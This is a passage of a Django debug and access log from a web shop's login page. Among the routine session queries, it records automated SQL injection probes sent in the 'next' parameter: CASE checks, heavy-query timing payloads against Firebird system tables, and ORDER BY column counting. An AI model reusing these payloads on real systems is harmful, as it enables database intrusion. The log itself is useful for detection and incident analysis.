'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 8, 980722, tzinfo=)) [01/Jan/2020 15:25:08] "GET /login/?next=SELECT%20%27qxvkq%27%7C%7C%28CASE%204790%20WHEN%204790%20THEN%201%20ELSE%200%20END%29%7C%7C%27qppzq%27%20FROM%20RDB%24DATABASE HTTP/1.0" 200 2008 DEBUG 2020-01-01 15:25:09,121 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9ezmf67ry7njn0nrjp11j8fuh3t8lbps' LIMIT 1; args=('9ezmf67ry7njn0nrjp11j8fuh3t8lbps',) DEBUG 2020-01-01 15:25:09,122 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9ezmf67ry7njn0nrjp11j8fuh3t8lbps', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:09.121649+00:00'::timestamptz); args=('9ezmf67ry7njn0nrjp11j8fuh3t8lbps', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 9, 121649, tzinfo=)) [01/Jan/2020 15:25:09] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:09,280 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gv001wyhq2t11ghc440q5yvyxgtuegn2' LIMIT 1; args=('gv001wyhq2t11ghc440q5yvyxgtuegn2',) DEBUG 2020-01-01 15:25:09,283 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gv001wyhq2t11ghc440q5yvyxgtuegn2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:09.281593+00:00'::timestamptz); args=('gv001wyhq2t11ghc440q5yvyxgtuegn2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 9, 281593, tzinfo=)) [01/Jan/2020 15:25:09] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:09,420 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sc8a7evoptkmaia77pnkkkyl7tqnl0dr' LIMIT 1; args=('sc8a7evoptkmaia77pnkkkyl7tqnl0dr',) DEBUG 2020-01-01 15:25:09,423 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sc8a7evoptkmaia77pnkkkyl7tqnl0dr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:09.421396+00:00'::timestamptz); args=('sc8a7evoptkmaia77pnkkkyl7tqnl0dr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 9, 421396, tzinfo=)) [01/Jan/2020 15:25:09] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:09,595 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't3x4vbr1pv220q52r1vhzkbl92jpp29d' LIMIT 1; args=('t3x4vbr1pv220q52r1vhzkbl92jpp29d',) DEBUG 2020-01-01 15:25:09,598 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t3x4vbr1pv220q52r1vhzkbl92jpp29d', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:09.596282+00:00'::timestamptz); args=('t3x4vbr1pv220q52r1vhzkbl92jpp29d', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 9, 596282, tzinfo=)) [01/Jan/2020 15:25:09] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:09,761 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'aeu5od5yodigyunzskkis8uwtj4gh03n' LIMIT 1; args=('aeu5od5yodigyunzskkis8uwtj4gh03n',) DEBUG 2020-01-01 15:25:09,764 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('aeu5od5yodigyunzskkis8uwtj4gh03n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:09.762144+00:00'::timestamptz); args=('aeu5od5yodigyunzskkis8uwtj4gh03n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 9, 762144, tzinfo=)) [01/Jan/2020 15:25:09] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:09,927 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'einidg98wp7vl3v8qoc8ushbcf2k3g0q' LIMIT 1; args=('einidg98wp7vl3v8qoc8ushbcf2k3g0q',) DEBUG 2020-01-01 15:25:09,930 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('einidg98wp7vl3v8qoc8ushbcf2k3g0q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:09.928370+00:00'::timestamptz); args=('einidg98wp7vl3v8qoc8ushbcf2k3g0q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 9, 928370, tzinfo=)) [01/Jan/2020 15:25:09] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:10,087 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ea03g1on36evyg7cqti2v85o328vxzf1' LIMIT 1; args=('ea03g1on36evyg7cqti2v85o328vxzf1',) DEBUG 2020-01-01 15:25:10,090 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ea03g1on36evyg7cqti2v85o328vxzf1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:10.088474+00:00'::timestamptz); args=('ea03g1on36evyg7cqti2v85o328vxzf1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 10, 88474, tzinfo=)) [01/Jan/2020 15:25:10] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:10,238 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tb3c4klfp2863xwmxeottsdg8ss12w8z' LIMIT 1; args=('tb3c4klfp2863xwmxeottsdg8ss12w8z',) DEBUG 2020-01-01 15:25:10,241 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tb3c4klfp2863xwmxeottsdg8ss12w8z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:10.239334+00:00'::timestamptz); args=('tb3c4klfp2863xwmxeottsdg8ss12w8z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 10, 239334, tzinfo=)) [01/Jan/2020 15:25:10] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:10,401 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'w4fy4mrn9narrd4b83ojjcaj58jfsbcr' LIMIT 1; args=('w4fy4mrn9narrd4b83ojjcaj58jfsbcr',) DEBUG 2020-01-01 15:25:10,403 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('w4fy4mrn9narrd4b83ojjcaj58jfsbcr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:10.401643+00:00'::timestamptz); args=('w4fy4mrn9narrd4b83ojjcaj58jfsbcr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 10, 401643, tzinfo=)) [01/Jan/2020 15:25:10] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:10,563 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'g437utjztoxi7tjpjw9dna1468u024ml' LIMIT 1; args=('g437utjztoxi7tjpjw9dna1468u024ml',) DEBUG 2020-01-01 15:25:10,567 utils 2749 140297233225472 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('g437utjztoxi7tjpjw9dna1468u024ml', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:10.564593+00:00'::timestamptz); args=('g437utjztoxi7tjpjw9dna1468u024ml', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 10, 564593, tzinfo=)) [01/Jan/2020 15:25:10] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:10,725 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3w2p0f940cbi2dmd7v3udlduiblq284w' LIMIT 1; args=('3w2p0f940cbi2dmd7v3udlduiblq284w',) DEBUG 2020-01-01 15:25:10,728 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3w2p0f940cbi2dmd7v3udlduiblq284w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:10.726480+00:00'::timestamptz); args=('3w2p0f940cbi2dmd7v3udlduiblq284w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 10, 726480, tzinfo=)) [01/Jan/2020 15:25:10] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:10,900 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0j4vfpmruqhfaultk6h0106hzvsibw30' LIMIT 1; args=('0j4vfpmruqhfaultk6h0106hzvsibw30',) DEBUG 2020-01-01 15:25:10,903 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0j4vfpmruqhfaultk6h0106hzvsibw30', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:10.901187+00:00'::timestamptz); args=('0j4vfpmruqhfaultk6h0106hzvsibw30', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 10, 901187, tzinfo=)) [01/Jan/2020 15:25:10] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:11,070 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'supnso3irb8oxdbgvexfeq4axr4swvwz' LIMIT 1; args=('supnso3irb8oxdbgvexfeq4axr4swvwz',) DEBUG 2020-01-01 15:25:11,073 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('supnso3irb8oxdbgvexfeq4axr4swvwz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:11.071120+00:00'::timestamptz); args=('supnso3irb8oxdbgvexfeq4axr4swvwz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 11, 71120, tzinfo=)) [01/Jan/2020 15:25:11] "GET /login/?next=%2F%3BSELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4-- HTTP/1.0" 200 2026 DEBUG 2020-01-01 15:25:11,239 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'aa5pl4uq1cmij6jsp0lgu6r9m5h0769p' LIMIT 1; args=('aa5pl4uq1cmij6jsp0lgu6r9m5h0769p',) DEBUG 2020-01-01 15:25:11,241 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('aa5pl4uq1cmij6jsp0lgu6r9m5h0769p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:11.239626+00:00'::timestamptz); args=('aa5pl4uq1cmij6jsp0lgu6r9m5h0769p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 11, 239626, tzinfo=)) [01/Jan/2020 15:25:11] "GET /login/?next=%2F%3BSELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4 HTTP/1.0" 200 2022 DEBUG 2020-01-01 15:25:11,404 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wxz86tfh56pycdo8exyopb4m0ahmgp0l' LIMIT 1; args=('wxz86tfh56pycdo8exyopb4m0ahmgp0l',) DEBUG 2020-01-01 15:25:11,407 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wxz86tfh56pycdo8exyopb4m0ahmgp0l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:11.405457+00:00'::timestamptz); args=('wxz86tfh56pycdo8exyopb4m0ahmgp0l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 11, 405457, tzinfo=)) [01/Jan/2020 15:25:11] "GET /login/?next=%2F%20AND%203975%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 HTTP/1.0" 200 2052 DEBUG 2020-01-01 15:25:11,565 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rutxjq6h0dz0m2semm0dtcxxml6tz4tt' LIMIT 1; args=('rutxjq6h0dz0m2semm0dtcxxml6tz4tt',) DEBUG 2020-01-01 15:25:11,568 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rutxjq6h0dz0m2semm0dtcxxml6tz4tt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:11.566431+00:00'::timestamptz); args=('rutxjq6h0dz0m2semm0dtcxxml6tz4tt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 11, 566431, tzinfo=)) [01/Jan/2020 15:25:11] "GET /login/?next=%2F%20OR%207264%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 HTTP/1.0" 200 2050 DEBUG 2020-01-01 15:25:11,717 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'i72b1xe2o74yfo1l4t1eyg4xk5skii9x' LIMIT 1; args=('i72b1xe2o74yfo1l4t1eyg4xk5skii9x',) DEBUG 2020-01-01 15:25:11,719 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('i72b1xe2o74yfo1l4t1eyg4xk5skii9x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:11.718105+00:00'::timestamptz); args=('i72b1xe2o74yfo1l4t1eyg4xk5skii9x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 11, 718105, tzinfo=)) [01/Jan/2020 15:25:11] "GET /login/?next=%2F%20AND%203065%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- HTTP/1.0" 200 2056 DEBUG 2020-01-01 15:25:11,884 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2s0gjrm8pxx81eouc2h7ngn8hdso1vc2' LIMIT 1; args=('2s0gjrm8pxx81eouc2h7ngn8hdso1vc2',) DEBUG 2020-01-01 15:25:11,887 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2s0gjrm8pxx81eouc2h7ngn8hdso1vc2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:11.885162+00:00'::timestamptz); args=('2s0gjrm8pxx81eouc2h7ngn8hdso1vc2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 11, 885162, tzinfo=)) [01/Jan/2020 15:25:11] "GET /login/?next=%2F%20OR%207502%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- HTTP/1.0" 200 2054 DEBUG 2020-01-01 15:25:12,049 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0jvazdvj7wndyngydmdpapqo1yfm282z' LIMIT 1; args=('0jvazdvj7wndyngydmdpapqo1yfm282z',) DEBUG 2020-01-01 15:25:12,051 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0jvazdvj7wndyngydmdpapqo1yfm282z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:12.049626+00:00'::timestamptz); args=('0jvazdvj7wndyngydmdpapqo1yfm282z', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 12, 49626, tzinfo=)) [01/Jan/2020 15:25:12] "GET /login/?next=%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 HTTP/1.0" 200 2022 DEBUG 2020-01-01 15:25:12,222 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'xyrbzjqzf526f2zvbd2ol9sqdxm5xulf' LIMIT 1; args=('xyrbzjqzf526f2zvbd2ol9sqdxm5xulf',) DEBUG 2020-01-01 15:25:12,225 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('xyrbzjqzf526f2zvbd2ol9sqdxm5xulf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:12.223474+00:00'::timestamptz); args=('xyrbzjqzf526f2zvbd2ol9sqdxm5xulf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 12, 223474, tzinfo=)) [01/Jan/2020 15:25:12] "GET /login/?next=%2F%20ORDER%20BY%201--%20NTew HTTP/1.0" 200 1832 DEBUG 2020-01-01 15:25:12,398 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'dzw7nhzhy0x7srifg37f6jjsq5fax658' LIMIT 1; args=('dzw7nhzhy0x7srifg37f6jjsq5fax658',) DEBUG 2020-01-01 15:25:12,401 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('dzw7nhzhy0x7srifg37f6jjsq5fax658', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:12.399137+00:00'::timestamptz); args=('dzw7nhzhy0x7srifg37f6jjsq5fax658', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 12, 399137, tzinfo=)) [01/Jan/2020 15:25:12] "GET /login/?next=%2F%20ORDER%20BY%206734--%20lvEa HTTP/1.0" 200 1838 DEBUG 2020-01-01 15:25:12,571 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '27g9eh25dpb75gnpae00qfwancfukgtl' LIMIT 1; args=('27g9eh25dpb75gnpae00qfwancfukgtl',) DEBUG 2020-01-01 15:25:12,574 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('27g9eh25dpb75gnpae00qfwancfukgtl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:12.571897+00:00'::timestamptz); args=('27g9eh25dpb75gnpae00qfwancfukgtl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 12, 571897, tzinfo=)) [01/Jan/2020 15:25:12] "GET /login/?next=%2F%20ORDER%20BY%2010--%20FYEq HTTP/1.0" 200 1834 DEBUG 2020-01-01 15:25:12,735 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6mrxjqzw8d8y64og9b1krpuzyamwnty9' LIMIT 1; args=('6mrxjqzw8d8y64og9b1krpuzyamwnty9',) DEBUG 2020-01-01 15:25:12,737 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6mrxjqzw8d8y64og9b1krpuzyamwnty9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:12.735902+00:00'::timestamptz); args=('6mrxjqzw8d8y64og9b1krpuzyamwnty9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 12, 735902, tzinfo=)) [01/Jan/2020 15:25:12] "GET /login/?next=%2F%20ORDER%20BY%2020--%20AEzB HTTP/1.0" 200 1834 DEBUG 2020-01-01 15:25:12,883 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7zatvuwo81ln7w08v12m7c8pdh6bfn0x' LIMIT 1; args=('7zatvuwo81ln7w08v12m7c8pdh6bfn0x',) DEBUG 2020-01-01 15:25:12,886 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7zatvuwo81ln7w08v12m7c8pdh6bfn0x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:12.884378+00:00'::timestamptz); args=('7zatvuwo81ln7w08v12m7c8pdh6bfn0x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 12, 884378, tzinfo=)) [01/Jan/2020 15:25:12] "GET /login/?next=%2F%20ORDER%20BY%2030--%20upvO HTTP/1.0" 200 1834 DEBUG 2020-01-01 15:25:13,051 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hryrhr7exzoslyn3ao8j7xryr5eqmdvs' LIMIT 1; args=('hryrhr7exzoslyn3ao8j7xryr5eqmdvs',) DEBUG 2020-01-01 15:25:13,054 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hryrhr7exzoslyn3ao8j7xryr5eqmdvs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:13.052236+00:00'::timestamptz); args=('hryrhr7exzoslyn3ao8j7xryr5eqmdvs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 13, 52236, tzinfo=)) [01/Jan/2020 15:25:13] "GET /login/?next=%2F%20ORDER%20BY%2025--%20gGvP HTTP/1.0" 200 1834 DEBUG 2020-01-01 15:25:13,192 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm84iiaafqssi6z17rjhk9dxpr6yumkjw' LIMIT 1; args=('m84iiaafqssi6z17rjhk9dxpr6yumkjw',) DEBUG 2020-01-01 15:25:13,194 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m84iiaafqssi6z17rjhk9dxpr6yumkjw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:13.192751+00:00'::timestamptz); args=('m84iiaafqssi6z17rjhk9dxpr6yumkjw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 13, 192751, tzinfo=)) [01/Jan/2020 